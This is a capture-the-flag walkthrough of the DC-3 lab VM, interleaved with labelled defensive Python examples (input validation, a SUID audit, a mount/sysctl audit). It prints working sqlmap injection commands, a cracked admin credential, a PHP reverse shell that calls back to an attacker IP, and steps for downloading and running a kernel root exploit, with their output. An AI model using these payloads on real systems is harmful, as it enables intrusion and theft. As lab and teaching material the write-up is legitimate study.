Download address: https://www.vulnhub.com/entry/dc-3,312/
Host discovery
Port scan: only port 80 is open; with the -A option you can also see that the site's CMS is Joomla.
Visit port 80
Directory scan: found the site's admin backend.
Using the nikto tool: nikto -host 192.168.44.144
Using the dirsearch tool
python3 dirsearch.py -u http://192.168.44.144 -e php
Using joomscan, the Joomla-specific vulnerability scanner, to find the exact Joomla version number
git clone https://github.com/rezasp/joomscan.git
cd joomscan
perl joomscan.pl 192.168.44.144
Use searchsploit to search for known vulnerabilities in Joomla 3.7.0
searchsploit joomla 3.7.0
Read the advisory
Following the path given, read the file: this version of the CMS has a SQL injection vulnerability, CVE-2017-8917.
Open sqlmap and start injecting
Dump the databases
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"
Dump the tables
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb --tables
Dump the columns
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users --columns
Dump the contents
python2 sqlmap.py --risk=3 --level=5 --random-agent --dbs -p list[fullordering] -u "192.168.44.144/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" -D joomladb -T #__users -C "name,password" --dump
Username: admin
Password (bcrypt hash): $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu
Crack the hash with John on Kali; the backend login password is snoopy.
Log in to the backend found earlier: http://192.168.44.144/administrator/
Poking around the backend, I found a place where the site templates can be edited; a new PHP file can be created there directly to get a reverse shell.
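The injection above works because Joomla 3.7.0 passed the `list[fullordering]` value into an ORDER BY clause without validating it. As an added example (not code from the page or from Joomla), the block below shows the shape of the fix, an allow-list validator for `<column> ASC|DESC`, and reuses that validator as detection logic over a few constructed Apache access-log lines. The column allow-list, the log lines and the helper names are assumptions made for this example.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed Apache combined-log lines (not from the page). Line 1 is a legitimate sort
# request, line 2 is unrelated, line 3 carries the error-based payload shape the sqlmap
# command above relies on (updatexml).
SAMPLE_LOG = [
    '192.168.44.142 - - [09/Apr/2020:23:20:01 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=a.title+ASC HTTP/1.1" 200 5123 "-" "Mozilla/5.0"',
    '192.168.44.142 - - [09/Apr/2020:23:20:05 +0800] "GET /index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8811 "-" "Mozilla/5.0"',
    '192.168.44.142 - - [09/Apr/2020:23:21:17 +0800] "GET /index.php?option=com_fields&view=fields&layout=modal&list%5Bfullordering%5D=updatexml(1,concat(1,user()),1) HTTP/1.1" 500 312 "-" "sqlmap/1.4"',
]

# Assumed allow-list of sortable columns for this example; a real fix takes it from the model.
ALLOWED_COLUMNS = {"a.id", "a.title", "a.name", "a.state", "a.ordering", "a.access", "a.language"}
ORDERING_RE = re.compile(r"^([a-z_][a-z0-9_]*\.[a-z_][a-z0-9_]*)\s+(asc|desc)$", re.IGNORECASE)


def is_valid_fullordering(value):
    """Accept only '<column> ASC|DESC' with the column on the allow-list; reject everything else."""
    m = ORDERING_RE.match(value.strip())
    return bool(m) and m.group(1).lower() in ALLOWED_COLUMNS


def order_by_clause(value):
    """Hardened ORDER BY builder: validated input is interpolated, invalid input falls back to a default."""
    if not is_valid_fullordering(value):
        return "ORDER BY a.ordering ASC"
    column, direction = value.strip().split()
    return f"ORDER BY {column} {direction.upper()}"


LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)


def scan_access_log(lines):
    """Flag com_fields requests whose list[fullordering] value fails the same validator."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if qs.get("option") != ["com_fields"]:
            continue
        for value in qs.get("list[fullordering]", []):
            if not is_valid_fullordering(value):
                findings.append({"ip": m.group("ip"), "time": m.group("ts"),
                                 "status": m.group("status"), "value": value})
    return findings


if __name__ == "__main__":
    for f in scan_access_log(SAMPLE_LOG):
        print(f"{f['time']} {f['ip']} status={f['status']} fullordering={f['value']!r}")
```

Run against a real access log by replacing `SAMPLE_LOG` with the file's lines; a burst of rejected `list[fullordering]` values from one source, as sqlmap produces, is the signal to alert on, and the validator itself is the mitigation if you cannot patch immediately.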
<?php system("bash -c 'bash -i >& /dev/tcp/192.168.44.142/8080 0>&1'");?>
Start a listener on Kali: nc -lvvp 8080
Visit the reverse-shell file in the browser. Working out the path took a while: combining the templates directory from the earlier directory scan with the template name beez3, and remembering that Linux is case-sensitive, it took some time to find the correct path to visit.
At this point Kali has received the shell.
Privileges are low, so first try SUID privilege escalation; the following commands list the SUID executables on the system:
- find / -perm -u=s -type f 2>/dev/null
- find / -user root -perm -4000 -print 2>/dev/null
- find / -user root -perm -4000 -exec ls -ldb {} \;
Linux executables known to be usable for privilege escalation: nmap, vim, find, bash, more, less, nano, cp
No exploitable file was found.
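The same enumeration the find commands above perform is what a defender should run against a known-good baseline. As an added example (not code from the page), the block below walks a tree for setuid regular files and splits them into the risky names the text lists, unexpected entries not in the baseline, and expected ones. The throwaway fixture tree, the baseline set and the function names are constructed for this example.

```python
import os
import shutil
import stat
import tempfile

# Binaries the walkthrough names as risky when setuid (the text's own list).
RISKY_SUID_NAMES = {"nmap", "vim", "find", "bash", "more", "less", "nano", "cp"}


def find_suid_files(root):
    """Equivalent of `find ROOT -perm -u=s -type f`: regular files with the setuid bit set."""
    hits = []
    for dirpath, _dirnames, filenames in os.walk(root):
        for name in filenames:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)  # lstat: do not follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def audit_suid(root, baseline):
    """Split setuid files into: risky (name on the list), baseline (expected), unexpected (new)."""
    report = {"risky": [], "unexpected": [], "baseline": []}
    for path in find_suid_files(root):
        if os.path.basename(path) in RISKY_SUID_NAMES:
            report["risky"].append(path)
        elif path in baseline:
            report["baseline"].append(path)
        else:
            report["unexpected"].append(path)
    return report


def run_demo():
    """Constructed fixture: a throwaway tree with setuid 'find' and 'passwd' plus a plain 'ls'.
    Returns the report with paths relative to the fixture root."""
    base = tempfile.mkdtemp(prefix="suid-audit-")
    try:
        bindir = os.path.join(base, "usr", "bin")
        os.makedirs(bindir)
        for name, mode in (("find", 0o4755), ("passwd", 0o4755), ("ls", 0o755)):
            p = os.path.join(bindir, name)
            with open(p, "w") as f:
                f.write("#!/bin/sh\nexit 0\n")
            os.chmod(p, mode)
        baseline = {os.path.join(bindir, "passwd")}  # what a known-good image is expected to carry
        report = audit_suid(base, baseline)
        return {k: [os.path.relpath(p, base) for p in v] for k, v in report.items()}
    finally:
        shutil.rmtree(base, ignore_errors=True)


if __name__ == "__main__":
    print(run_demo())
```

On a live host call `audit_suid("/", baseline)` with a baseline captured from a clean install; anything in `risky` or `unexpected` is a finding to remove or investigate, which is exactly the check that would have caught a setuid `find` or `vim` before an attacker did.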
Try kernel privilege escalation
Check the Linux version
Use searchsploit to search for an exploitable vulnerability
Following the path, view the exploit details: cat /usr/share/exploitdb/exploits/linux/local/39772.txt
Found the exploit download address: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Find a directory with execute permission
Switch to the tmp folder and download the exploit from searchsploit
Switch: cd tmp
Download: wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Unzip: unzip 39772.zip
Extract again: tar -xvf exploit.tar
Switch: cd ebpf_mapfd_doubleput_exploit/
Run: ./compile.sh
./doubleput
Then root privileges are obtained.
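Two conditions made the kernel step work: the web user could write and execute in a scratch directory, and the doubleput exploit loads an eBPF program from an unprivileged process, which the `kernel.unprivileged_bpf_disabled` sysctl turns off. As an added example (not code from the page or from the exploit), the block below audits both from a constructed /proc/mounts excerpt and a constructed sysctl reading; the sample data, the list of scratch directories and the function names are assumptions for this example.

```python
# Constructed /proc/mounts excerpt (not taken from the page): /tmp is already hardened,
# /dev/shm is not, and /var/tmp simply lives on the root filesystem.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro,data=ordered 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
"""

# Constructed sysctl reading; on a live host read /proc/sys/kernel/unprivileged_bpf_disabled.
SAMPLE_SYSCTL = {"kernel.unprivileged_bpf_disabled": "0"}

# Directories any local user can normally write to (assumed list for this example).
SCRATCH_DIRS = ("/tmp", "/var/tmp", "/dev/shm")


def parse_mounts(text):
    """Parse /proc/mounts-style lines into dicts, with the option string split into a set."""
    mounts = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        mounts.append({"device": parts[0], "mountpoint": parts[1],
                       "fstype": parts[2], "options": set(parts[3].split(","))})
    return mounts


def mount_for(path, mounts):
    """Return the mount entry whose mountpoint is the longest prefix of `path`."""
    best = None
    for m in mounts:
        mp = m["mountpoint"]
        if path == mp or path.startswith(mp.rstrip("/") + "/"):
            if best is None or len(mp) > len(best["mountpoint"]):
                best = m
    return best


def check_scratch_dirs(mounts, dirs=SCRATCH_DIRS):
    """Flag writable scratch directories that still allow execution (no noexec on their mount)."""
    findings = []
    for d in dirs:
        m = mount_for(d, mounts)
        if m is None:
            continue
        if "rw" in m["options"] and "noexec" not in m["options"]:
            findings.append(f"{d}: on {m['mountpoint']} ({m['fstype']}) is writable without noexec")
    return findings


def check_unprivileged_bpf(sysctl):
    """Value 0 lets unprivileged processes call bpf(), which the doubleput exploit needs."""
    val = sysctl.get("kernel.unprivileged_bpf_disabled", "0").strip()
    if val == "0":
        return ["kernel.unprivileged_bpf_disabled=0: unprivileged bpf() is allowed"]
    return []


def audit(mounts_text=SAMPLE_MOUNTS, sysctl=SAMPLE_SYSCTL):
    """Run both checks and return the list of findings (empty list means nothing flagged)."""
    mounts = parse_mounts(mounts_text)
    return check_scratch_dirs(mounts) + check_unprivileged_bpf(sysctl)


if __name__ == "__main__":
    for finding in audit():
        print("FINDING:", finding)
```

On a real host feed `open("/proc/mounts").read()` and the value of `/proc/sys/kernel/unprivileged_bpf_disabled` into `audit()`. Neither check replaces patching the kernel, but `noexec` on scratch mounts and `kernel.unprivileged_bpf_disabled=1` each remove a step this walkthrough depended on.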
www-data@DC3VM:/var/www/html$ cd tmp
cd tmp
www-data@DC3VM:/var/www/html/tmp$ ls
ls
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ wget https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
<ploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
--2020-04-09 23:27:16-- https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/39772.zip
Resolving github.com (github.com)... 13.250.177.223
Connecting to github.com (github.com)|13.250.177.223|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip [following]
--2020-04-09 23:27:17-- https://raw.githubusercontent.com/offensive-security/exploitdb-bin-sploits/master/bin-sploits/39772.zip
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 7025 (6.9K) [application/zip]
Saving to: '39772.zip'
0K ...... 100% 4.44M=0.002s
2020-04-09 23:27:18 (4.44 MB/s) - '39772.zip' saved [7025/7025]
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772.zip
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ unzip 39772.zip
unzip 39772.zip
Archive: 39772.zip
creating: 39772/
inflating: 39772/.DS_Store
creating: __MACOSX/
creating: __MACOSX/39772/
inflating: __MACOSX/39772/._.DS_Store
inflating: 39772/crasher.tar
inflating: __MACOSX/39772/._crasher.tar
inflating: 39772/exploit.tar
inflating: __MACOSX/39772/._exploit.tar
www-data@DC3VM:/var/www/html/tmp$ ls
ls
39772
39772.zip
__MACOSX
index.html
install_5c96069d60a51
install_5c9607f66e6c1
packages
pkg_proclaim.zip
pkg_proclaim_package.xml
script.php
www-data@DC3VM:/var/www/html/tmp$ cd 3977
cd 39772
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ tar -xvf exploit.tar
tar -xvf exploit.tar
ebpf_mapfd_doubleput_exploit/
ebpf_mapfd_doubleput_exploit/hello.c
ebpf_mapfd_doubleput_exploit/suidhelper.c
ebpf_mapfd_doubleput_exploit/compile.sh
ebpf_mapfd_doubleput_exploit/doubleput.c
www-data@DC3VM:/var/www/html/tmp/39772$ ls
ls
crasher.tar
ebpf_mapfd_doubleput_exploit
exploit.tar
www-data@DC3VM:/var/www/html/tmp/39772$ cd ebpf
cd ebpf_mapfd_doubleput_exploit/
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput.c
hello.c
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doub
./doub
bash: ./doub: No such file or directory
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./compile.sh
doubleput.c: In function 'make_setuid':
doubleput.c:91:13: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.insns = (__aligned_u64) insns,
^
doubleput.c:92:15: warning: cast from pointer to integer of different size [-Wpointer-to-int-cast]
.license = (__aligned_u64)""
^
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ls
ls
compile.sh
doubleput
doubleput.c
hello
hello.c
suidhelper
suidhelper.c
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
<l/tmp/39772/ebpf_mapfd_doubleput_exploit$ ./doubleput
starting writev
woohoo, got pointer reuse
writev returned successfully. if this worked, you'll have a root shell in <=60 seconds.
suid file detected, launching rootshell...
we have root privs now...
bash -i
bash: cannot set terminal process group (1315): Inappropriate ioctl for device
bash: no job control in this shell
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# id
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# whoami
whoami
root
root@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit# exit
bash: [2708: 2 (255)] tcsetattr: Inappropriate ioctl for device
www-data@DC3VM:/var/www/html/tmp/39772/ebpf_mapfd_doubleput_exploit$